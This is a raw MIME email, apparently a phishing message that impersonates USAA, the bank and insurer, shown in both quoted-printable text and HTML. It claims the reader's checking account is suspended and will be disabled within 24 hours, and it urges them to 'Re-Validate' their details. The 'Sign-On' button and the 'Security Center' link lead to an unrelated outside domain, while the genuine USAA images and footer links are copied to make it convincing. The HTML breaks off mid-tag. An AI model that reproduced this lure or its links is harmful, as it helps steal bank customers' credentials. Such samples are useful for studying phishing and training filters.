From: "USAA" <USAA.webb.centeno@mailer.com>
Date: Tue, 14 Feb 2017 16:47:52 -0500
Status: O
X-Status: 
X-Keywords:                  
X-UID: 68

You will not see this in a MIME-aware mail reader.
--===============0493653705==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


   To ensure delivery to your inbox, please add USAA.Customer.Service@mailc=
enter.usaa.com to your address book.
   	  	  =

   	  	  =

   	   	  =

    =

   	 =

  	 =

  	 =

	  =

   USAA SECURITY ZONE =

Security and
Privacy
USAA Center
	  =

   =

  =

  =

	  	  =

   	  =

                 Subscribed Security Alert
	  =

   	  	 =

   Dear USAA Member,    For your protection, USAA has temporarily suspended=
 your Checking account.
 =

We detected violation of our terms and policy. Your account will be disable=
d permanently within 24hours.  To prevent this, Re-Validate your account in=
formation and update your security preferences.
  =

  <https://content.usaa.com/mcontent/static_assets/Media/email_cta_arrow.gi=
f height=3D"15" width=3D"15" id=3D"yui_3_16_0_1_1399663152274_48861">	 Sign=
-On	 =

   USAA values your business and is committed to keeping your accounts and =
personal information safe. To learn how we protect your information, visit =
our Security Center =

      Thank you,    USAA   =

    USAA means United Services Automobile Association and its insurance, ba=
nking and investment affiliates.
  =

 =

    =

    	  	          =

	  	  =

  =

   	  	  =

   =

Please do not reply to this e-mail. To contact USAA, visit our secure conta=
ct page.

Privacy Promise

USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288

  We know what it means to serve =AE =

Insurance  Banking  Investments  Retirement  Advice
 88183-1008  =


	  	  =

 =20
--===============0493653705==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><TABLE style=3D"WHITE-SPACE: normal; WORD-SPAC=
ING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(0,0,0); FONT: 13px arial, helvet=
ica; WIDOWS: 1; LETTER-SPACING: normal; TEXT-INDENT: 0px; -webkit-text-stro=
ke-width: 0px" cellSpacing=3D0 cellPadding=3D0 width=3D650 bgColor=3D#0d284=
2 border=3D0>
<TBODY>
<TR height=3D25>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" vAlign=3Dmiddle c=
olSpan=3D5 align=3Dcenter><FONT style=3D"FONT-SIZE: 9px; COLOR: rgb(255,255=
,255)" face=3D"Verdana, sans-serif">To ensure delivery to your inbox, pleas=
e add<SPAN class=3DApple-converted-space>&nbsp;</SPAN><A style=3D"FONT-SIZE=
: 9px; COLOR: rgb(255,255,255)" href=3D"mailto:USAA.Web.Services@customerma=
il.usaa.com" target=3D_blank>USAA.Customer.Service@<WBR>mailcenter.usaa.com=
<SPAN class=3DApple-converted-space>&nbsp;</SPAN></A>to your address book.<=
/FONT></TD></TR>
<TR height=3D3>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D3 width=
=3D20>&nbsp;</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#ffffff=
 height=3D3 width=3D610 colSpan=3D3>&nbsp;</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D3 width=
=3D20>&nbsp;</TD></TR>
<TR height=3D90>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D20>&nbsp;=
</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#ffffff=
 width=3D5>&nbsp;</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#ffffff=
 width=3D600>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D600 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D45 width=
=3D30><A style=3D"COLOR: rgb(17,85,204)" href=3D"https://www.usaa.com/inet/=
ent_logon/Logon?EID=3D88183-1008_head" target=3D_blank data-saferedirecturl=
=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttps://www.usaa.com/inet/en=
t_logon/Logon?EID%3D88183-1008_head&amp;source=3Dgmail&amp;ust=3D1466158300=
262000&amp;usg=3DAFQjCNFdgfXBZXzHp8evvxNDnTYaA-7nRA"><IMG class=3DCToWUd bo=
rder=3D0 alt=3D"" src=3D"https://ci4.googleusercontent.com/proxy/trwGUZiiRP=
lCls9ZRgDdcFNdCsQUVq2NYMciY5ip3h0XB9jZhKrySGUcxF5hbwyVwbKHgGPSFDnO8EAeR5gkR=
XvmVqqC7UMAclJeMLhmZMfVUmxb2Zfnh_wzBgJ6ax3G5-UbIXcOtw=3Ds0-d-e1-ft#http://c=
ontent.usaa.com/mcontent/static_assets/om/Media/SENDS_USAA_COLOR_LOGO.jpg" =
width=3D73 height=3D80></A></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<DIV>&nbsp;</DIV><FONT style=3D"FONT-SIZE: 12px; COLOR: rgb(255,255,255); L=
INE-HEIGHT: 18px" face=3D"Verdana, sans-serif"></FONT></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D45 vAlig=
n=3Dmiddle width=3D367 align=3Dright>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D188 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D22>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D22 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" h=
eight=3D29 vAlign=3Dtop width=3D8><IMG class=3DCToWUd style=3D"DISPLAY: blo=
ck" border=3D0 alt=3D"" src=3D"https://ci6.googleusercontent.com/proxy/jrFK=
j4PLPJz9oi41b7ommxMkt6pS7RcAW_abiw8hNXwYenN8rMzqe86gYPshqI40yEmBMZbxQYe1Vff=
F7XfNtF9wIepmvgfguj4tAtx6OI911-tB0rFQ40qXJK7Zv6HyArfGN7nzEhVthv_0=3Ds0-d-e1=
-ft#https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-1.gif=
?EID=3D5839475677" width=3D8 height=3D29></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" b=
gColor=3D#e7e7e8 height=3D29 vAlign=3Dtop width=3D14><IMG class=3DCToWUd st=
yle=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://ci5.googleusercon=
tent.com/proxy/vMOlYe-5W7Hn5D8SSem02uE85zY5gJ-GGNnEKxojoZFQP66ZGjjiq8nzShDY=
j0gCMUKDg7eVmGrcoOsnk9rJM7g8Q_xJAfFPo_SW59sS8OP4cEoEdMrOW5M6K30J=3Ds0-d-e1-=
ft#https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-2.gif"=
 width=3D14 height=3D29></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" h=
eight=3D29 vAlign=3Dtop width=3D8><IMG class=3DCToWUd style=3D"DISPLAY: blo=
ck" border=3D0 alt=3D"" src=3D"https://ci4.googleusercontent.com/proxy/oz0x=
72b7BlCaGH8IPbQbX_hSzXnVLKA8IkAVzuk-7QSTtgXEhP4UomOz_dIm7EZTeZoD4E8zDlfByMu=
xzwWzKtArsu3qVV1VS8wNHm_EBbx2byafEki0jWXLZW1Utw54=3Ds0-d-e1-ft#https://cont=
ent.usaa.com/mcontent/static_assets/Media/email_sec_spacer.gif" width=3D8 h=
eight=3D29></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" b=
gColor=3D#e7e7e8 height=3D29 vAlign=3Dtop width=3D14><IMG class=3DCToWUd st=
yle=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://ci4.googleusercon=
tent.com/proxy/oz0x72b7BlCaGH8IPbQbX_hSzXnVLKA8IkAVzuk-7QSTtgXEhP4UomOz_dIm=
7EZTeZoD4E8zDlfByMuxzwWzKtArsu3qVV1VS8wNHm_EBbx2byafEki0jWXLZW1Utw54=3Ds0-d=
-e1-ft#https://content.usaa.com/mcontent/static_assets/Media/email_sec_spac=
er.gif" width=3D14 height=3D29></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" h=
eight=3D7 vAlign=3Dbottom width=3D8></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" b=
gColor=3D#e7e7e8 height=3D7 vAlign=3Dbottom width=3D14><IMG class=3DCToWUd =
style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://ci4.googleuserc=
ontent.com/proxy/QpItTHbCMIqp9uIGJcz5CZt6z7lXd3M9qFTIfX2kOXdmIBv0Ncveo5yhFs=
WiI6w0tsnQeFByn2ZDce_EHZSt9oMlCOpHu0bjKhHjwvjkR6CGss7ikXUO0jYDP9tK=3Ds0-d-e=
1-ft#https://content.usaa.com/mcontent/static_assets/Media/email_sec_2-1.gi=
f" width=3D14 height=3D7></TD></TR></TBODY></TABLE></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#e7e7e8=
 align=3Dleft>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D5 width=3D"100%" border=3D=
0>
<TBODY>
<TR>
<TD style=3D"FONT-SIZE: 9px; FONT-FAMILY: arial, sans-serif; TEXT-ALIGN: le=
ft; MARGIN: 0px; LINE-HEIGHT: 12px" vAlign=3Dmiddle align=3Dleft><FONT styl=
e=3D"FONT-SIZE: 10px; COLOR: rgb(0,54,91)" face=3D"Arial, Helvetica, sans-s=
erif"><STRONG>USAA SECURITY ZONE</STRONG></FONT><SPAN class=3DApple-convert=
ed-space>&nbsp;</SPAN><BR><FONT style=3D"FONT-SIZE: 9px; COLOR: rgb(0,54,91=
)" face=3D"Arial, Helvetica, sans-serif">Security and<br>Privacy<br>USAA Ce=
nter</br></FONT></TD></TR></TBODY></TABLE></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#ffffff=
 width=3D7>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D7 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" b=
gColor=3D#e7e7e8 height=3D7 vAlign=3Dtop width=3D7 align=3Dright><IMG class=
=3DCToWUd style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://ci6.g=
oogleusercontent.com/proxy/AKIhTrGxlc8dRLYqFBbhjPqRmcW28DdWAgQz2w58zTHNrQly=
HQ-9_5gSMB5v9RNrAkCfWwxc0GVEnwGOlL-a8WhHxAvWtBE2p6Zn6osXYgAnO1cXyrSjg-l1_Mt=
v=3Ds0-d-e1-ft#https://content.usaa.com/mcontent/static_assets/Media/email_=
sec_1-3.gif" width=3D7 height=3D7></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" b=
gColor=3D#e7e7e8 height=3D51 vAlign=3Dtop width=3D7 align=3Dright><IMG clas=
s=3DCToWUd style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://ci4.=
googleusercontent.com/proxy/oz0x72b7BlCaGH8IPbQbX_hSzXnVLKA8IkAVzuk-7QSTtgX=
EhP4UomOz_dIm7EZTeZoD4E8zDlfByMuxzwWzKtArsu3qVV1VS8wNHm_EBbx2byafEki0jWXLZW=
1Utw54=3Ds0-d-e1-ft#https://content.usaa.com/mcontent/static_assets/Media/e=
mail_sec_spacer.gif" width=3D7 height=3D51></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px; LINE-HEIGHT: 0" b=
gColor=3D#e7e7e8 height=3D7 vAlign=3Dbottom width=3D7 align=3Dright><IMG cl=
ass=3DCToWUd style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://ci=
3.googleusercontent.com/proxy/3Hs3pOcNCDxgktK_1_a5AHLBDBql5QiLAfWrzR51scCv4=
wVEQfayt17itPWHf4l54oiIuD-BpBrKWOUxO7PLo-pmMxV0XMPNWXE_8xfq4VJ-I_wL_mELE2Iv=
1lj6=3Ds0-d-e1-ft#https://content.usaa.com/mcontent/static_assets/Media/ema=
il_sec_2-2.gif" width=3D7 height=3D7></TD></TR></TBODY></TABLE></TD></TR></=
TBODY></TABLE></TD></TR></TBODY></TABLE></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#ffffff=
 width=3D5>&nbsp;</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D20>&nbsp;=
</TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D20>&nbsp;=
</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D610 colSp=
an=3D3>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D610 align=3Dleft border=3D0>
<TBODY>
<TR align=3Dleft>
<TD style=3D"FONT-FAMILY: arial, sans-serif; VERTICAL-ALIGN: middle; MARGIN=
: 0px" height=3D72 background=3Dhttps://ci5.googleusercontent.com/proxy/zX0=
VcZsno2FAt3Xva4AS2G0xMVGdLr0lIu8t0r5dg7JdezilwjlGB8DLl-UIkjRSJQThOMh2QYMOp7=
3ixjR4HEaFgoXX240mtuDsFg-tItXei9cmG7bCi0UsQc-yYeZjNNxKYfidGp7duduMH0tZEg4M=
=3Ds0-d-e1-ft#http://content.usaa.com/mcontent/static_assets/om/Media/thumb=
nails/Blue_Strip_With_Red_A.gif cellpadding=3D"0" cellspacing=3D"0"><FONT s=
tyle=3D"FONT-SIZE: 16px; COLOR: rgb(255,255,255)" face=3D"Verdana, sans-ser=
if"><B>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;</B>Subscribed Security Alert</B></FONT></TD></TR></TBODY><=
/TABLE></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D20>&nbsp;=
</TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D20>&nbsp;=
</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#ffffff=
 width=3D5>&nbsp;</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#ffffff=
 width=3D600 align=3Dleft><BR>
<DIV>
<DIV style=3D"MARGIN-LEFT: 1em; MARGIN-RIGHT: 1em">
<DIV style=3D"MARGIN-BOTTOM: 0pt; FONT-STYLE: normal"><SPAN style=3D"COLOR:=
 rgb(51,51,51)">Dear<SPAN class=3DApple-converted-space>&nbsp;</SPAN></SPAN=
>USAA Member<SPAN style=3D"COLOR: rgb(51,51,51)">,<SPAN></SPAN></SPAN><SPAN=
 style=3D"COLOR: rgb(51,51,51)"></SPAN></DIV>
<DIV style=3D"MARGIN-BOTTOM: 0pt; FONT-STYLE: normal"><SPAN style=3D"COLOR:=
 rgb(51,51,51)"><SPAN></SPAN></SPAN><SPAN style=3D"COLOR: rgb(51,51,51)"></=
SPAN>&nbsp;</DIV>
<DIV style=3D"MARGIN-BOTTOM: 0pt; FONT-STYLE: normal"><SPAN style=3D"COLOR:=
 rgb(51,51,51)"><SPAN></SPAN></SPAN><SPAN style=3D"COLOR: rgb(51,51,51)"><F=
ONT style=3D"FONT-SIZE: 12px; COLOR: #333333; LINE-HEIGHT: 18px" face=3D"Ve=
rdana, sans-serif">
<P style=3D"MARGIN-BOTTOM: 1em">For your protection, USAA has temporarily s=
uspended your Checking account.</P>
<br>We detected violation of our terms and policy. Your account will be dis=
abled permanently within 24hours. </br>
<p>To prevent this, Re-Validate your account information and update your se=
curity preferences.</p>
<p>
<table cellspacing=3D"0" cellpadding=3D"0" border=3D"0" bgcolor=3D"#6cae35"=
 style=3D"background:no-repeat top left;" height=3D"15" id=3D"yui_3_16_0_1_=
1399663152274_48813" width=3D"111">
<tbody id=3D"yui_3_16_0_1_1399663152274_48812"><tr bgcolor=3D"#6cae35" id=
=3D"yui_3_16_0_1_1399663152274_48811">
<td width=3D"15" align=3D"center" valign=3D"middle" bgcolor=3D"#6cae35" id=
=3D"yui_3_16_0_1_1399663152274_48862"><https://content.usaa.com/mcontent/st=
atic_assets/Media/email_cta_arrow.gif height=3D"15" width=3D"15" id=3D"yui_=
3_16_0_1_1399663152274_48861"></td>
<td width=3D"96" align=3D"center" valign=3D"middle" bgcolor=3D"#6cae35" id=
=3D"yui_3_16_0_1_1399663152274_48810"><a rel=3D"nofollow" target=3D"_blank"=
 href=3D"http://www.fondationlgl.com/plugins/com.htm" style=3D"font:bold 11=
px arial, sans-serif;color:#fff;text-decoration:none;" id=3D"yui_3_16_0_1_1=
399663152274_48814"	>Sign-On</a></td>
</tr>
</tbody></table><font face=3D"Verdana, sans-serif" style=3D"color:#333333;f=
ont-size:12px;line-height:18px;" id=3D"yui_3_16_0_1_1399663152274_19828">
  </div>   =

<P style=3D"MARGIN-BOTTOM: 1em">USAA values your business and is committed =
to keeping your accounts and personal information safe. To learn how we pro=
tect your information, visit our <A href=3D"https://www.fondationlgl.com/pl=
ugins/com.htm">Security Center</A>&nbsp;</P></FONT></SPAN></DIV>
<DIV style=3D"MARGIN-BOTTOM: 0pt; FONT-STYLE: normal"><SPAN style=3D"COLOR:=
 rgb(51,51,51)"><SPAN></SPAN></SPAN><SPAN style=3D"COLOR: rgb(51,51,51)"></=
SPAN>&nbsp;</DIV>
<DIV style=3D"MARGIN-BOTTOM: 0pt; FONT-STYLE: normal"><SPAN style=3D"COLOR:=
 rgb(51,51,51)">&nbsp;&nbsp;&nbsp;Thank you,<SPAN></SPAN></SPAN><SPAN style=
=3D"COLOR: rgb(51,51,51)"></SPAN></DIV>
<DIV style=3D"MARGIN-BOTTOM: 0pt; FONT-STYLE: normal"><SPAN style=3D"COLOR:=
 rgb(51,51,51)">&nbsp;&nbsp;&nbsp;USAA<SPAN></SPAN></SPAN><SPAN style=3D"CO=
LOR: rgb(51,51,51)"></SPAN></DIV>
<DIV style=3D"MARGIN-BOTTOM: 0pt; FONT-STYLE: normal"><SPAN style=3D"FONT-S=
IZE: 8pt; COLOR: rgb(51,51,51)"><SPAN></SPAN></SPAN><SPAN style=3D"FONT-SIZ=
E: 8pt; COLOR: rgb(51,51,51)"></SPAN>&nbsp;</DIV></DIV>
<TABLE style=3D"FONT-STYLE: normal; MARGIN-LEFT: 4.5pt">
<TBODY>
<TR>
<TD style=3D"BORDER-TOP: medium none; FONT-FAMILY: arial, sans-serif; BORDE=
R-RIGHT: medium none; WIDTH: 499.5pt; BORDER-BOTTOM: medium none; PADDING-B=
OTTOM: 0in; PADDING-TOP: 0in; PADDING-LEFT: 0in; MARGIN: 0px; BORDER-LEFT: =
medium none; PADDING-RIGHT: 0in" vAlign=3Dtop>
<DIV style=3D"MARGIN-BOTTOM: 0pt; FONT-STYLE: normal; MARGIN-LEFT: 9.35pt">=
<SPAN style=3D"FONT-SIZE: 8pt; COLOR: rgb(51,51,51)">USAA means United Serv=
ices Automobile Association and its insurance, banking and investment affil=
iates.<B><SPAN></SPAN></B></SPAN><SPAN style=3D"FONT-SIZE: 8pt; FONT-WEIGHT=
: bold; COLOR: rgb(51,51,51)"></SPAN></DIV></TD></TR></TBODY></TABLE>
<DIV style=3D"MARGIN-BOTTOM: 0pt; FONT-STYLE: normal"><SPAN style=3D"FONT-S=
IZE: 8pt; COLOR: rgb(51,51,51)"><SPAN></SPAN></SPAN><SPAN style=3D"FONT-SIZ=
E: 8pt; COLOR: rgb(51,51,51)"></SPAN>&nbsp;</DIV></DIV><BR>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D600 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D"95%" ali=
gn=3Dleft>
<TABLE>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D30 width=
=3D"40%" align=3Dleft><A style=3D"COLOR: rgb(17,85,204)" href=3D"https://co=
mmunities.usaa.com/?EID=3D88183-1008_footer" target=3D_blank data-saferedir=
ecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttps://communities.us=
aa.com/?EID%3D88183-1008_footer&amp;source=3Dgmail&amp;ust=3D14661583002630=
00&amp;usg=3DAFQjCNHqpLf1B8jGbwVPq9o-0vr8nMbm_w"><IMG class=3DCToWUd border=
=3D0 alt=3D"Member Community" src=3D"https://ci5.googleusercontent.com/prox=
y/EI6GzgWn4rTNjoOvt4QDhZR5qg3v6QTpWteEGYsRORcMYVz1KuMfV-JAm74n9Krq_rAiQNbHh=
_Gv1Ym7iBkygGf8EZ_5sXjSW1qGHVeRZPNPpihv8gPJNqUErd9t9TlwCmXW293UZwyaNvuotg=
=3Ds0-d-e1-ft#http://content.usaa.com/mcontent/static_assets/om/Media/thumb=
nails/Member_Community.gif" width=3D232 height=3D40></A>&nbsp;</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D30 width=
=3D"30%" align=3Dcenter><A style=3D"COLOR: rgb(17,85,204)" href=3D"https://=
www.usaa.com/inet/pages/usaa_mobile_main?EID=3D88183-1008_footer" target=3D=
_blank data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dh=
ttps://www.usaa.com/inet/pages/usaa_mobile_main?EID%3D88183-1008_footer&amp=
;source=3Dgmail&amp;ust=3D1466158300263000&amp;usg=3DAFQjCNG7wlky2BlyfEiehy=
kUu3AEyBG88w"><IMG class=3DCToWUd border=3D0 alt=3D"Go Mobile" src=3D"https=
://ci6.googleusercontent.com/proxy/ugfTuUt4kBk50RbAgLibaAYZQzjpJuq4rYZ3crnr=
H9bbf7_vhsp0H2ZLQHzBbGwaCGp4H69Bmdre1F58QjlwA7OYI3KcsvRzKXVImsxNnoDRAYjPuzM=
Vbb4o55grEIr7vSkJhp3g=3Ds0-d-e1-ft#http://content.usaa.com/mcontent/static_=
assets/om/Media/thumbnails/Go_Mobile.gif" width=3D91 height=3D32></A>&nbsp;=
</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D30 width=
=3D"30%" align=3Dright><A style=3D"COLOR: rgb(17,85,204)" href=3D"http://ww=
w.facebook.com/USAA?EID=3D88183-1008_footer" target=3D_blank data-saferedir=
ecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttp://www.facebook.co=
m/USAA?EID%3D88183-1008_footer&amp;source=3Dgmail&amp;ust=3D146615830026300=
0&amp;usg=3DAFQjCNGZ5WmfOaPL_38x3jJ3hPtxPZiRNg"><IMG class=3DCToWUd border=
=3D0 alt=3DFacebook src=3D"https://ci5.googleusercontent.com/proxy/CeuYshs2=
B1yU4WzB7d7J_pvbsiCY4FjIZol5zgTf594JE9TQqC_wRoOehFFCJ8u9X-XEEsdcWeDVa2vprZ9=
39glu2XA7ZouvXoHZFczwBlmiwbBqGAUSQj_1C_ynhVq4ppGpaakeFm3U=3Ds0-d-e1-ft#http=
://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/facebook_new=
.gif" width=3D32 height=3D32></A>&nbsp;&nbsp;<SPAN class=3DApple-converted-=
space>&nbsp;</SPAN><A style=3D"COLOR: rgb(17,85,204)" href=3D"http://twitte=
r.com/usaa?EID=3D88183-1008_footer" target=3D_blank data-saferedirecturl=3D=
"https://www.google.com/url?hl=3Den&amp;q=3Dhttp://twitter.com/usaa?EID%3D8=
8183-1008_footer&amp;source=3Dgmail&amp;ust=3D1466158300263000&amp;usg=3DAF=
QjCNHWFdgTR6xyGMmv1cLStzkxNF-1Gw"><IMG class=3DCToWUd border=3D0 alt=3DTwit=
ter src=3D"https://ci3.googleusercontent.com/proxy/XIrzH1M6K1qRdJ76bfA8__by=
cziB4-QvMt3aXNc3K5MJK3lPeoV9mGkazi4kAyrcwCyJp7JFL1MkM_VNc7vWSKe3w4UyxofFOQc=
xvXlSAlo6tJQf_5joZ9RQTz-6j9p96ORVffOky70=3Ds0-d-e1-ft#http://content.usaa.c=
om/mcontent/static_assets/om/Media/thumbnails/twitter_new.gif" width=3D32 h=
eight=3D32></A>&nbsp;&nbsp;<SPAN class=3DApple-converted-space>&nbsp;</SPAN=
><A style=3D"COLOR: rgb(17,85,204)" href=3D"https://www.youtube.com/user/us=
aa/custom?EID=3D88183-1008_footer" target=3D_blank data-saferedirecturl=3D"=
https://www.google.com/url?hl=3Den&amp;q=3Dhttps://www.youtube.com/user/usa=
a/custom?EID%3D88183-1008_footer&amp;source=3Dgmail&amp;ust=3D1466158300263=
000&amp;usg=3DAFQjCNERo8Mp9YPeChHgsfr2uFzKTRMJSw"><IMG class=3DCToWUd borde=
r=3D0 alt=3D"You Tube" src=3D"https://ci4.googleusercontent.com/proxy/UNNOJ=
HcMl2bh6veN8oesLzVuRjQEMT3Lm2ywUsraka01eplf4SxpW5oZi7btwdpfOrGdK00QAJkW8wSY=
d2EBkU1unw_w_KHfoh4LfwhKg0T19nWI7B-l09qxMjY84qHWuj6srj1oDHY=3Ds0-d-e1-ft#ht=
tp://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/youtube_ne=
w.gif" width=3D32 height=3D32></A>&nbsp;&nbsp;<SPAN class=3DApple-converted=
-space>&nbsp;</SPAN><A style=3D"COLOR: rgb(17,85,204)" href=3D"https://www.=
usaa.com/inet/pages/usaa_social_main?EID=3D88183-1008_footer" target=3D_bla=
nk data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttps=
://www.usaa.com/inet/pages/usaa_social_main?EID%3D88183-1008_footer&amp;sou=
rce=3Dgmail&amp;ust=3D1466158300263000&amp;usg=3DAFQjCNFpue8zI7rkvzWfUsriQ6=
JIORiwKQ"><IMG class=3DCToWUd border=3D0 alt=3DMore src=3D"https://ci6.goog=
leusercontent.com/proxy/vl9lBXdqbdP7Uhk-pWnDvPZs5gw3FgAbb3YUclQu8MmVqsIDllo=
F72iieFF2Jgm-xXFsyiYljSfio9mHrUYRTOh6WBwwapQjkE59hSqaV13KOcZivCrxqeUhQUQHuJ=
Z6pe84vN8Yk2UV=3Ds0-d-e1-ft#http://content.usaa.com/mcontent/static_assets/=
om/Media/thumbnails/moreicon_new.gif" width=3D32 height=3D32></A></TD></TR>=
</TBODY></TABLE></TD></TR></TBODY></TABLE></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#ffffff=
 width=3D5>&nbsp;</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D20>&nbsp;=
</TD></TR>
<TR height=3D25>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" colSpan=3D5></TD>=
</TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D20>&nbsp;=
</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#ffffff=
 width=3D5>&nbsp;</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#ffffff=
 width=3D600>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D600 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#ffffff=
 width=3D600 align=3Dcenter><BR><FONT style=3D"FONT-SIZE: 10px; COLOR: rgb(=
0,0,0)" face=3D"Verdana, sans-serif"><FONT style=3D"FONT-SIZE: 10px; COLOR:=
 rgb(0,0,0)" face=3D"Verdana, sans-serif">Please do not reply to this e-mai=
l. To contact USAA, visit our secure</FONT><SPAN class=3DApple-converted-sp=
ace>&nbsp;</SPAN><A style=3D"COLOR: rgb(17,85,204)" href=3D"https://www.usa=
a.com/inet/ent_references/CpSendUsAMessage?ContentArea=3Dcp&amp;EID=3D88183=
-1008_foot" target=3D_blank data-saferedirecturl=3D"https://www.google.com/=
url?hl=3Den&amp;q=3Dhttps://www.usaa.com/inet/ent_references/CpSendUsAMessa=
ge?ContentArea%3Dcp%26EID%3D88183-1008_foot&amp;source=3Dgmail&amp;ust=3D14=
66158300263000&amp;usg=3DAFQjCNHoLenvMG4cRQEzvYM5Gnu8pG9BuQ">contact page</=
A>.<BR><BR><A style=3D"COLOR: rgb(17,85,204)" href=3D"https://www.usaa.com/=
inet/pages/privacy_promise?EID=3D88183-1008_foot" target=3D_blank data-safe=
redirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttps://www.usaa.=
com/inet/pages/privacy_promise?EID%3D88183-1008_foot&amp;source=3Dgmail&amp=
;ust=3D1466158300263000&amp;usg=3DAFQjCNFD7OPfnm029d1mcPWR9FATi07w-A">Priva=
cy Promise</A><BR><BR>USAA, 9800 Fredericksburg Road, San Antonio, Texas 78=
288<BR><BR>
<DIV align=3Dleft><FONT style=3D"FONT-SIZE: 10px; COLOR: rgb(0,0,0); LINE-H=
EIGHT: 20px" face=3D"Verdana, sans-serif"></FONT></DIV><FONT style=3D"FONT-=
